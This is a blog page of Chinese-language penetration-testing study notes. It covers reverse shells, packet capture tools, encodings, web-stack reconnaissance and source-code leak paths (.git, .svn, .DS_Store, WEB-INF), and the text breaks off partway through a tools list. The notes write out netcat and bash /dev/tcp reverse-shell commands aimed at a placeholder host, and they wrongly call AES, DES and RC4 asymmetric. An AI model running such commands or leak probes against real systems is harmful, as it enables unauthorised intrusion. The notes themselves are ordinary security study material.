<!DOCTYPE html>
<html lang=en class="no-js" data-blog-theme="cactus">
<head><script id="double-exposure-config" type="application/json">{"registry":{"version":1,"default":"cactus","current":"cactus","storageKey":"double-exposure.theme.preference","themes":[{"id":"cactus","label":"Cactus","root":"/","aliases":[]},{"id":"glass","label":"Glass","root":"/__themes/glass/","aliases":["classic"]}]},"current":"cactus","switcher":{"presentation":{"label":"Theme","icon":"palette"},"mounts":[{"id":"primary-search","target":"#header #nav \u003e ul \u003e .nav-search","insert":"before","wrapper":"li","unlessPresent":"#header-post"},{"id":"primary","target":"#header #nav \u003e ul","insert":"append","wrapper":"li","unlessPresent":["#header-post","#header #nav \u003e ul \u003e .nav-search"]},{"id":"post-desktop","target":"#header-post #nav \u003e ul","insert":"append","wrapper":"li"},{"id":"post-mobile","target":"#nav-footer \u003e ul","insert":"append","wrapper":"li"}]}}</script><script data-double-exposure-bootstrap>(function () {
  'use strict';

  var element = document.getElementById('double-exposure-config');
  if (!element) return;
  var state;
  try { state = JSON.parse(element.textContent); } catch (_) { return; }
  window.__DOUBLE_EXPOSURE__ = state;

  var registry = state.registry || {};
  var themes = {};
  var aliases = {};
  (registry.themes || []).forEach(function (theme) {
    themes[theme.id] = theme;
    (theme.aliases || []).forEach(function (alias) { aliases[alias] = theme.id; });
  });

  function normalize(id) {
    var candidate = aliases[id] || id;
    return themes[candidate] ? candidate : null;
  }

  function parseSaved(raw) {
    if (!raw) return null;
    try {
      var saved = JSON.parse(raw);
      return normalize(typeof saved === 'string' ? saved : saved && saved.id);
    } catch (_) {
      return normalize(raw);
    }
  }

  function readCookie(name) {
    var prefix = encodeURIComponent(name) + '=';
    var cookies = document.cookie ? document.cookie.split('; ') : [];
    for (var index = 0; index < cookies.length; index += 1) {
      if (cookies[index].indexOf(prefix) === 0) {
        try { return decodeURIComponent(cookies[index].slice(prefix.length)); } catch (_) { return null; }
      }
    }
    return null;
  }

  var selected = null;
  try { selected = parseSaved(localStorage.getItem(registry.storageKey)); } catch (_) {}
  if (!selected) selected = parseSaved(readCookie(registry.storageKey));
  if (!selected) selected = normalize(registry.default) || registry.current;

  var root = document.documentElement;
  root.classList.remove('no-js');
  root.classList.add('js');
  root.setAttribute('data-de-theme', registry.current);
  root.setAttribute('data-blog-theme', registry.current);

  if (selected !== registry.current && themes[selected] && themes[registry.current]) {
    var currentRoot = themes[registry.current].root || '/';
    var targetRoot = themes[selected].root || '/';
    var logicalPath = location.pathname;
    if (currentRoot !== '/' && logicalPath.indexOf(currentRoot) === 0) {
      logicalPath = '/' + logicalPath.slice(currentRoot.length);
    }
    var destination = targetRoot.replace(/\/$/, '') + '/' + logicalPath.replace(/^\//, '') +
      location.search + location.hash;
    location.replace(destination);
  }
})();
</script>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;sunny11&#x2F;p&#x2F;13583083.html">
<meta property="og:type" content="article">
<meta property="og:title" content="网络安全学习笔记（小迪）">
<meta property="og:url" content="https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="Shimmer">
<meta property="og:description" content="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;sunny11&#x2F;p&#x2F;13583083.html">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2026-09-10T07:54:16.000Z">
<meta property="article:modified_time" content="2026-09-10T07:54:16.000Z">
<meta property="article:author" content="Zoe">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.png">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>网络安全学习笔记（小迪）</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
    <link href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.10.0/katex.min.css" rel="stylesheet" type="text/css">
<meta name="generator" content="Hexo 6.3.0"><link rel="stylesheet" href="/double-exposure/switcher-base.css?v=b8f9b4faeeae" data-double-exposure-style="base"><link rel="stylesheet" href="/double-exposure/switcher-adapter.css?v=b8f9b4faeeae" data-double-exposure-style="adapter"></head>

<body class="max-width mx-auto px3 ltr" data-theme-slot="page" data-page-kind="post">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/10/12/ControlNet/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&text=网络安全学习笔记（小迪）"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&title=网络安全学习笔记（小迪）"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&is_video=false&description=网络安全学习笔记（小迪）"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=网络安全学习笔记（小迪）&body=Check out this article: https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&title=网络安全学习笔记（小迪）"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&title=网络安全学习笔记（小迪）"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&title=网络安全学习笔记（小迪）"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&title=网络安全学习笔记（小迪）"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&name=网络安全学习笔记（小迪）&description=https://www.cnblogs.com/sunny11/p/13583083.html"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&t=网络安全学习笔记（小迪）"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="toc-number">1.</span> <span class="toc-text"> 基础知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%8F%8D%E5%BC%B9shell-%E8%A7%A3%E5%86%B3%E6%95%B0%E6%8D%AE%E5%9B%9E%E6%98%BE%E5%92%8C%E4%BA%A4%E4%BA%92%E5%BC%8F%E5%9B%9E%E6%98%BE-%E6%95%B0%E6%8D%AE%E9%80%9A%E4%BF%A1%E9%97%AE%E9%A2%98"><span class="toc-number">1.1.</span> <span class="toc-text"> 1. 反弹shell-解决数据回显和交互式回显、数据通信问题</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-web-%E5%BA%94%E7%94%A8"><span class="toc-number">1.2.</span> <span class="toc-text"> 2. Web 应用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9-web%E6%9E%B6%E6%9E%84"><span class="toc-number">1.3.</span> <span class="toc-text"> 3. 信息打点-Web架构</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#a-web%E6%9E%B6%E6%9E%84-%E8%AF%AD%E8%A8%80%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E7%AD%89"><span class="toc-number">1.3.1.</span> <span class="toc-text"> a. Web架构-语言&amp;中间件&amp;数据库&amp;系统等</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#b-web%E6%BA%90%E7%A0%81-cms%E5%BC%80%E6%BA%90%E9%97%AD%E6%BA%90%E5%94%AE%E5%8D%96%E8%87%AA%E4%B8%BB%E7%A0%94%E5%8F%91%E7%AD%89"><span class="toc-number">1.3.2.</span> <span class="toc-text"> b. Web源码-CMS开源&amp;闭源售卖&amp;自主研发等</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#c-web%E6%BA%90%E7%A0%81%E8%8E%B7%E5%8F%96-%E6%B3%84%E9%9C%B2%E5%AE%89%E5%85%A8%E8%B5%84%E6%BA%90%E7%9B%91%E6%8E%A7%E5%85%B6%E4%BB%96%E7%AD%89"><span class="toc-number">1.3.3.</span> <span class="toc-text"> c. Web源码获取-泄露安全&amp;资源监控&amp;其他等</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#d-web%E5%9F%9F%E5%90%8D-%E5%AD%90%E5%9F%9F%E5%90%8D%E7%9B%B8%E4%BC%BC%E5%9F%9F%E5%90%8D%E5%8F%8D%E6%9F%A5%E5%9F%9F%E5%90%8D%E6%97%81%E6%B3%A8%E7%AD%89"><span class="toc-number">1.3.4.</span> <span class="toc-text"> d. Web域名-子域名&amp;相似域名&amp;反查域名&amp;旁注等</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9-%E7%B3%BB%E7%BB%9F"><span class="toc-number">1.4.</span> <span class="toc-text"> 3. 信息打点-系统</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9C%A8%E7%BA%BF%E9%9D%B6%E5%9C%BA"><span class="toc-number">2.</span> <span class="toc-text"> 在线靶场</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div id="site-content" class="content index py4 " data-theme-slot="site-shell">
        <header id="header" data-theme-slot="site-header">
  <a class="u-url u-uid" href="/">
  
    
      <img id="logo" alt class="u-logo" src="/images/logo.png" />
    
  
    <div id="title">
      <h1 class="p-name">Shimmer</h1>
    </div>
  </a>
  <div id="nav" data-theme-slot="primary-nav">
    <ul>
      <li class="icon">
        <a href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-2x"></i></a>
      </li>
      <!--
     --><li data-nav-key="home"><a href="/"><i class="nav-item-icon fa-solid fa-home" aria-hidden="true"></i><span class="nav-item-text">Home</span></a></li><!--
   --><!--
     --><li data-nav-key="articles"><a href="/archives/"><i class="nav-item-icon fa-solid fa-clock" aria-hidden="true"></i><span class="nav-item-text">Writing</span></a></li><!--
   --><!--
     --><li data-nav-key="category"><a href="/categories/"><i class="nav-item-icon fa-solid fa-cubes-stacked" aria-hidden="true"></i><span class="nav-item-text">Category</span></a></li><!--
   --><!--
     --><li data-nav-key="tag"><a href="/tags/"><i class="nav-item-icon fa-solid fa-tags" aria-hidden="true"></i><span class="nav-item-text">Tag</span></a></li><!--
   -->
      <!--
     --><li class="nav-search">
          <form id="nav-search-form" role="search" data-search-path="/search.xml">
            <i class="fa-solid fa-magnifying-glass" aria-hidden="true"></i>
            <input type="search" id="nav-search-input" autocomplete="off" placeholder="Search..." aria-label="Search...">
            <div id="nav-search-results" role="listbox" aria-label="Search..."></div>
          </form>
        </li><!--
   -->
    </ul>
  </div>
</header>

        <main class="theme-page-flow" data-theme-slot="page-flow">
          <div class="theme-post-layout" data-theme-slot="post-layout">
  <aside class="theme-post-toc-position" data-theme-slot="post-toc-position" aria-label="Table of contents">
    <div class="theme-post-toc" data-theme-slot="post-toc">
      <div class="theme-post-toc-title">目录</div>
      <ul><li><a href="#基础知识">基础知识</a><ul><li><a href="#1-反弹shell-解决数据回显和交互式回显-数据通信问题">1. 反弹shell-解决数据回显和交互式回显、数据通信问题</a></li><li><a href="#2-web-应用">2. Web 应用</a></li><li><a href="#3-信息打点-web架构">3. 信息打点-Web架构</a><ul><li><a href="#a-web架构-语言中间件数据库系统等">a. Web架构-语言&amp;中间件&amp;数据库&amp;系统等</a></li><li><a href="#b-web源码-cms开源闭源售卖自主研发等">b. Web源码-CMS开源&amp;闭源售卖&amp;自主研发等</a></li><li><a href="#c-web源码获取-泄露安全资源监控其他等">c. Web源码获取-泄露安全&amp;资源监控&amp;其他等</a></li><li><a href="#d-web域名-子域名相似域名反查域名旁注等">d. Web域名-子域名&amp;相似域名&amp;反查域名&amp;旁注等</a></li></ul></li><li><a href="#3-信息打点-系统">3. 信息打点-系统</a></li></ul></li><li><a href="#在线靶场">在线靶场</a></li></ul>
    </div>
  </aside>
<article class="post h-entry" data-theme-slot="post" itemscope itemtype="http://schema.org/BlogPosting">
  <div class="theme-post-banner" data-theme-slot="post-banner">
    <div class="theme-post-banner-title"><span class="banner-title-zh" lang="zh-CN">网络安全学习笔记</span><span class="banner-title-en" lang="en">（</span><span class="banner-title-zh" lang="zh-CN">小迪</span><span class="banner-title-en" lang="en">）</span></div>
    <div class="theme-post-banner-meta">
      <span><i class="fa-solid fa-calendar-days" aria-hidden="true"></i> 2026-09-10 15:54:16</span>
      <span>|</span><span><i class="fa-solid fa-folder" aria-hidden="true"></i> 网络安全</span>
    </div>
  </div>
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        网络安全学习笔记（小迪）
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Zoe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2026-09-10T07:54:16.000Z" class="dt-published" itemprop="datePublished">2026-09-10 15:54:16</time>
        
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/Note/">Note</a> › <a class="category-link" href="/categories/Note/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" data-theme-slot="post-content" itemprop="articleBody">
    <p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/sunny11/p/13583083.html">https://www.cnblogs.com/sunny11/p/13583083.html</a></p>
<p><a target="_blank" rel="noopener" href="https://forum.ywhack.com/bountytips.php?download">https://forum.ywhack.com/bountytips.php?download</a></p>
<p><a target="_blank" rel="noopener" href="https://forum.ywhack.com/reverse-shell/">https://forum.ywhack.com/reverse-shell/</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43303273/article/details/83029138">https://blog.csdn.net/weixin_43303273/article/details/83029138</a></p>
<h2 id="基础知识"><a class="markdownIt-Anchor" href="#基础知识"></a> 基础知识</h2>
<h3 id="1-反弹shell-解决数据回显和交互式回显-数据通信问题"><a class="markdownIt-Anchor" href="#1-反弹shell-解决数据回显和交互式回显-数据通信问题"></a> 1. 反弹shell-解决数据回显和交互式回显、数据通信问题</h3>
<p>nc工具（Netcat）：接收反向shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Server：nc -lvvp 5577 # 监听该端口，返回极其详细的日志</span><br><span class="line">Client: nc -e cmd sever_ip 5577 # 主动发起 TCP 三次握手连接</span><br><span class="line">Client(MacOS): /bin/bash -c &#x27;bash -i &gt;&amp; /dev/tcp/sever_ip/5577 0&gt;&amp;1&#x27;</span><br><span class="line">curl -4 cip.cc # 快速查询本机公网ip</span><br></pre></td></tr></table></figure>
<p>交换c、s，可以交换出入站，绕开防火墙</p>
<p>反向连接：让目标主机主动连接进攻主机。正向连接则相反</p>
<h3 id="2-web-应用"><a class="markdownIt-Anchor" href="#2-web-应用"></a> 2. Web 应用</h3>
<ul>
<li>
<p>环境架构</p>
<ul>
<li>开发语言</li>
<li>程序源码：开发语言、应用类型、开源CMS、开发框架等</li>
<li>中间件容器、数据库类型、服务器操作系统、第三方软件等</li>
</ul>
</li>
<li>
<p>安全漏洞分类</p>
<p>SQL注入、文件安全、RCE执行、XSS跨站、CSRF/SSRF/CRLF、反序列化、逻辑越权、未授权访问、XXE/XML、弱口令安全等</p>
</li>
<li>
<p>抓包、封包…</p>
<ul>
<li>
<p>抓包：截获请求，看请求了什么地址、用了什么参数、服务器返回了什么等等</p>
</li>
<li>
<p>封包：按照某个App或协议要求的格式，构造出类似的请求数据，比如填写请求头、参数、二进制字段、校验值等，再发送给服务器。</p>
<p>常用于做游戏外挂</p>
<p>能精确到每个操作的数据包，例如利用封包，能直接操作游戏中的回城功能。</p>
</li>
<li>
<p>应用分类</p>
<ul>
<li>Web应用站点操作数据抓包-浏览器F12网络监听</li>
<li>APP、小程序、PC抓包HTTP/S数据-Fiddler、Charles、BurpSuite</li>
<li>程序进程、网络接口、其他协议抓包-WireShark、科来网络分析系统</li>
<li>通讯类应用程序封包分析发送接收-WPE四件套封包、科来网络分析系统</li>
</ul>
</li>
</ul>
</li>
<li>
<p>工具</p>
<ul>
<li>
<p>Fiddler、Charles、BurpSuite：HTTP协议</p>
<p>抓取对象：APP、小程序、PC抓包。<br />
Fiddler、Charles纯抓包</p>
<p>Bp可以用于重放或者别的安全测试</p>
</li>
<li>
<p>Wireshark、科来网络分析系统、TCPDump：其他协议，网络封包分析软件</p>
<ul>
<li>
<p>科来网络分析系统</p>
<p>可筛选进程的数据包，新手友好</p>
</li>
</ul>
</li>
<li>
<p>隧道代理：应对拉黑IP和封IP问题</p>
<p>local-proxy-target</p>
<p>例如local被target拉黑了，那就可以通过代理请求。且每次请求可以换不同代理</p>
</li>
<li>
<p>其他辅助工具</p>
<ul>
<li>BurpSuite：Web抓包工具</li>
<li>Charles：将包按照URL地址分类，便于查看。触发相关地址时高亮</li>
<li>Proxy Switchy（浏览器插件抓包插件）：其实就是为浏览器单独设置代理，让请求和响应变为server-bp-browser。即使不通过插件，应该也有别的方式实现。好像可以直接为电脑设置代理，这样web和小程序都能走bp</li>
<li>Proxifier（电脑上的微信小程序抓包软件）</li>
<li>安卓模拟器：逍遥、雷电、夜神</li>
<li>CCProxy：APK-CCProxy-WPE监控cc进行，实现封包抓包</li>
</ul>
</li>
</ul>
</li>
<li>
<p>考虑阻碍</p>
<ul>
<li>站库分离</li>
<li>CDN加速服务，如果找到的是缓存，攻击的也是缓存，需要找到真正的服务器ip</li>
<li>负载均衡服务，多台服务器提供服务，可能找到的只是备用机（目标一般是主控），备用机可能想要的东西</li>
<li>WAF应用防火墙</li>
<li>主机防护防火墙</li>
</ul>
</li>
<li>
<p>加密编码</p>
<ul>
<li>
<p>常见</p>
<ul>
<li>
<p>密码存储加密：MD5(32|16), SHA1(40), NTLM, AES, DES, RC4</p>
<ul>
<li>MD5可能会加上Salt，增加破解难度</li>
<li>NTLM，Windows的哈希密码，标准通讯安全协议</li>
<li>AES, DES, RC4，都是非对称加密算法，引入密钥，密文特征与BASE64相似</li>
</ul>
</li>
<li>
<p>传输数据编码：BASE64, URL, HEX, ASCII</p>
<p>应用场景：参数传递（如注入影响，后期WAF绕过干扰写法应用、视频地址还原等）</p>
<ul>
<li>BASE64：大小写敏感，结尾通常有符号<code>=</code></li>
<li>URL：大小写敏感，通常以<code>%</code>数字字母间隔</li>
</ul>
</li>
<li>
<p>JS前端代码加密：JS颜文字，jother，JSFUCK</p>
<ul>
<li>jother特征：只用<code>! + ()[]&#123;&#125;</code>这八个字符，就能完成对任意字符串的编码，也可在F12中解密执行</li>
<li>JSFUCK特征：与jother类似，只是少了<code>&#123;&#125;</code></li>
</ul>
</li>
<li>
<p>后端代码加密：PHP, .NET, JAVA</p>
<p>应用场景：版权代码加密，开发特性，CTF比赛等</p>
<ul>
<li>
<p>PHP，乱码，头部有信息，例如<code>Zendxxxx</code>就用了zend|54加密</p>
</li>
<li>
<p>.NET：DLL封装代码文件</p>
<p>解密软件：ILSpy</p>
</li>
<li>
<p>JAVA：JAR &amp; CLASS文件</p>
</li>
</ul>
</li>
<li>
<p>数据库加密：MYSQL，MSSQL等</p>
</li>
<li>
<p>数据显示编码：UTF-8，GBK2312等</p>
</li>
</ul>
</li>
<li>
<p>识别算法编码类型</p>
<ul>
<li>看密文位数</li>
<li>看密文特征（数字、字母、大小写、符号等）</li>
<li>看当前密文存在的地方（Web、数据库、操作系统等应用）</li>
</ul>
</li>
<li>
<p>解密：逆运算、枚举、碰撞</p>
</li>
<li>
<p>部分参考资源</p>
<p><a target="_blank" rel="noopener" href="http://www.hiencode.com/">http://www.hiencode.com/</a></p>
<p><a target="_blank" rel="noopener" href="https://jsfuck.com/">https://jsfuck.com/</a></p>
</li>
</ul>
</li>
</ul>
<h3 id="3-信息打点-web架构"><a class="markdownIt-Anchor" href="#3-信息打点-web架构"></a> 3. 信息打点-Web架构</h3>
<h4 id="a-web架构-语言中间件数据库系统等"><a class="markdownIt-Anchor" href="#a-web架构-语言中间件数据库系统等"></a> a. Web架构-语言&amp;中间件&amp;数据库&amp;系统等</h4>
<ul>
<li>
<p>判断服务器系统：URL大小写，TTL</p>
</li>
<li>
<p>数据库、中间件：通过常用搭建组合 或 端口扫描判定</p>
<ul>
<li>
<p>常见组合</p>
<ul>
<li>IIS - windows</li>
<li>aspx - mssql</li>
</ul>
</li>
<li>
<p>数据库常见端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">- 关系数据库</span><br><span class="line">	- MySQL 3306</span><br><span class="line">	- Oracle 1521</span><br><span class="line">	- SQL Server 1433</span><br><span class="line">	- DB2, Sybase 5000</span><br><span class="line">	- PostgreSQL 5432</span><br><span class="line">	- DM达梦数据库 5236</span><br><span class="line">- NoSQL数据库</span><br><span class="line">	- Redis 6379</span><br><span class="line">	- Memcached 11211</span><br><span class="line">	- MongoDB 27017</span><br><span class="line"></span><br></pre></td></tr></table></figure>
</li>
<li>
<p>源码</p>
<ul>
<li>直接利用公开漏洞库尝试安全测试</li>
<li>白盒代码审计 挖漏洞</li>
</ul>
</li>
<li>
<p>mysql：漏洞或弱口令等</p>
</li>
<li>
<p>PHP：常规漏洞，如log4j</p>
</li>
<li>
<p>中间件漏洞网络上有很多文章汇总</p>
</li>
<li>
<p>主动式探针 &amp; 被动式探针</p>
<ul>
<li>
<p>被动式探针：部分目标在SRC规定中禁止主动式，因此可以借助网络上的接口来查询</p>
<p><a target="_blank" rel="noopener" href="http://coolaf.com/zh/tool/port">http://coolaf.com/zh/tool/port</a></p>
</li>
</ul>
<blockquote>
<p>SRC 是各大互联网厂商开启的漏洞发现奖励计划（漏洞赏金计划），旨在鼓励广大安全研究人员积极发现厂商产品或服务安全漏洞，并向厂商提交漏洞报告。</p>
<p><a target="_blank" rel="noopener" href="https://www.butian.net/Reward/plan/2">https://www.butian.net/Reward/plan/2</a></p>
</blockquote>
</li>
</ul>
</li>
</ul>
<h4 id="b-web源码-cms开源闭源售卖自主研发等"><a class="markdownIt-Anchor" href="#b-web源码-cms开源闭源售卖自主研发等"></a> b. Web源码-CMS开源&amp;闭源售卖&amp;自主研发等</h4>
<h4 id="c-web源码获取-泄露安全资源监控其他等"><a class="markdownIt-Anchor" href="#c-web源码获取-泄露安全资源监控其他等"></a> c. Web源码获取-泄露安全&amp;资源监控&amp;其他等</h4>
<p><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/124398.html">https://www.secpulse.com/archives/124398.html</a></p>
<ul>
<li>
<p>泄露原因：源码本身特性入口、管理员不好的习惯、配置、意识、资源信息搜集入口</p>
</li>
<li>
<p>源码泄露集合</p>
<ul>
<li>CMS识别不到时
<ul>
<li>composer.json：PHP特性，类似Java的Maven、Node.js的npm</li>
<li>开源代码控制工具配置不当：
<ul>
<li>git (<a target="_blank" rel="noopener" href="https://github.com/lijiejie/GitHack">GitHack</a>): .git文件未删除就发布。domain/.git直接获取，如果能获取到就没删除</li>
<li>svn (<a target="_blank" rel="noopener" href="https://github.com/callmefeifei/SvnHack">SvnHack</a>): 同理，domain/.svn/entries</li>
</ul>
</li>
<li>.DS_Store 文件泄露（<a target="_blank" rel="noopener" href="https://github.com/lijiejie/ds_store_exp">ds_store_exp</a>）: Mac下Finder用于保存如何展示 文件/文件夹 的数据文件，每个文件夹下对应一个。可能造成文件目录结构泄露，特别是备份文件、源代码文件。同理 domain/.DS_Store</li>
</ul>
</li>
<li>WEB-INF/web.xml 泄露：Java的WEB应用的安全目录，如果想在页面中直接访问其中的文件，必须通过web.xml文件对要访问的文件进行相应映射才能访问。<br />
主要包含一下文件或目录：<br />
WEB-INF/web.xml：Web应用程序配置文件，描述了servlet和其他的应用组件配置及命名规则. WEB-INF/database.properties：数据库配置文件<br />
WEB-INF/classes/：一般用来存放Java类文件（.class) WEB-INF/lib/：用来存放打包好的库（jar)<br />
WEB-INF/src/：用来放源代码（.asp和.php等）</li>
<li>SWP文件泄露、CVS 、Bzr、Github、hg、网站压缩备份文件</li>
</ul>
</li>
<li>
<p>工具<br />
CMs识别:<a target="_blank" rel="noopener" href="https://www.yunsee.cn/">https://www.yunsee.cn/</a><br />
